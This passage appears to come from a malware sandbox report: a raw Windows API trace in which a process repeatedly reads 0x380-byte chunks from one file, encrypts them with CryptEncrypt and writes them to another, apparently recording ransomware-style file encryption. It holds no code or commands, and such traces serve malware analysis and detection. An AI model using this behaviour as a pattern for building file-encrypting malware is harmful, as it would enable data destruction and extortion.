lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.410] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.410] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.410] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.410] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.411] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.411] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.411] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.411] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.411] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.411] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.411] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.411] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.412] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.412] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.412] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.412] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.412] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.412] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.412] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.412] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.412] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.412] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.412] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.412] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.412] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.412] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.412] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.413] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.413] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.413] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.413] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.413] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.413] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.413] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.413] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.413] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.413] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.413] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.413] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.414] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.414] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.414] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.414] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.414] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.414] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.414] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.414] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.414] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.414] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.414] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.414] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.414] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.414] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.415] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.415] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.415] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.415] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.415] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.415] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.415] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.415] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.415] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.415] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.415] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.415] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.415] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.416] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.416] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.416] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.416] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.416] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.416] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.416] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.416] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.416] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.416] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.416] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.416] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.416] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.416] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.417] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.417] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.417] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.417] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.417] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.417] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.417] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.417] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.417] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.417] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.417] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.417] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.417] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.417] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.418] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.418] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.418] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.418] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.418] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.418] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.418] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.418] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, 